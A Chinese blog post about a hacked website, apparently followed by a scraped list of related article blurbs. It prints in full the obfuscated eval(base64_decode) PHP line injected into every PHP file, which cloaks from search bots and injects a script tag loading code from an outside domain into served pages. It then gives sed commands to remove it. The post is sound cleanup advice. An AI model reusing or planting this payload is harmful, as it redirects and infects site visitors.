网站被黑
近日网站被黑,所有的php文件的第一行都被加上了一段代码,如下:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzVqYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>
base64_decode 之后发现是恶意跳到其他的网站上。
还好用以下命令得以修复:
find . -type f -name "*.php" -exec sed -i '/eval(base64_decode("aW/d' {} \;
之后问了个同事相关的命令也可以达到同样的效果:
find ./ -type f -name "*.php" -exec sed -i -e '1,1 s/.*eval.*//' -e '/^$/ d' {} \;
'1,1 s/.*eval.*//' 这个把第一行包含eval的行先换成空行,然后-e 链接后续命令 '/^$/ d'把空行删除
==========补充分割线===================
把文件的第一个空格或这制表符替换成 <?php
find ./ -type f -name "status.php" -exec sed -i -e '1,1 s/^ /<?php\t/' {} \;
find ./ -type f -name "status.php" -exec sed -i -e '1,1 s/^\t/<?php\t/' {} \;
相关推荐
中科天玑网站被黑监测系统白皮书详细介绍了该系统在大规模网络环境下的分布式信息安全监控功能,旨在为政府或企业提供大规模、周期性的网站安全监测服务,帮助用户发现并应对网站被攻击的情况。系统通过主动跟踪重点...
这篇文档主要是教那些零基础的网络营销学员如何发现自己的网站被黑了,又如何自己动手去解决那些常见网站被黑的问题。其实作为网络营销推广人员并不需要了解网站被黑该怎么去解决,因为严格意义上来说这个不属于网络...
3步解决IIS网站安全防止网站被黑.docx
网站被黑后处理方法及删除批量恶意代码的方法步骤
网站被黑的假象--ARP欺骗之页面中加入一段js
网站安全也是一直是我们做网站的重中之重,网站服务是否稳定,对用户、站方和搜索引擎来说都非常重要。目前国内网站的安全问题十分严峻,众多网站由第三方代建,维护人员缺乏足够的知识,大量的网站都存在不同程度的...
被黑站点统计网站源代码,喜欢的可以下载。
您的用户网站被黑,有以下几种原因造成的: 1. 是您的客户的网站代码有问题,存在安全漏洞造成的。 如果您的服务器上大部分用户的网站都正常,只有少量用户网站被黑,那 么就很可能是您少量用户网站被黑的网站...
刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。 [removed][removed] 于是只能从这段代码入手,我下载这个js开发发现是下面一段代码: 代码...
以下文章为星外科技版权所有,有少量用户一遇到网站被黑,就马上认为是星外平台造成的.这是一种误解. 因为如果是客户的网站代码有问题,星外的平台是无法解决的,谁也帮不了这个用户.这是因为,黑客利用用户网站的漏洞,...
网站被黑后的处理方法及批量删除恶意代码
网站数据库被黑网站数据库被黑
Python作为一种强大的编程语言,常被用于编写各种自动化脚本,其中包括检查IP地址是否被列入黑名单的工具。"Python-isthisipbad"项目就是这样一个实用工具,它允许用户快速地检查特定IP地址是否存在于多个流行的IP/...
黑色网站源码黑色网站源码黑色网站源码黑色网站源码黑色网站源码黑色网站源码黑色网站源码黑色网站源码黑色网站源码黑色网站源码
黑色+红色为主调的网站建设公司网站模板,为网站建设、设计行业的朋友提供了一个优秀的业务平台,网站设计精美,布局大气,网站案例功能专门采用后台自定义模型单独设计,可更好为把客户展示出来,此模板适用于网络...
在网页设计中,有时我们可能需要为特殊场合或者表示哀悼而将网站的主题颜色临时调整为黑白。这种操作可以通过修改CSS(层叠样式表)代码实现。本文将深入讲解如何编写代码来将网站变黑白,以及相关的编程知识。 ...
皮皮网站黑名单工具 详细介绍 皮皮网站黑名单工具主要是结合应用接口支持库和操作系统界面功能支持库,通过提交网站网站来设置,实现禁止网站访问功能。 软件特点: 皮皮网站黑名单工具可以有效访问垃圾网站、广告...
2. 高级感:黑白色调常被视为高端和专业的象征,适合企业、艺术或个人品牌的在线展示。 3. 可读性:黑白对比有助于提高文本的可读性,尤其是在大段文字或复杂信息的展示中。 二、PSD源文件 1. 设计工具:PSD是Adobe...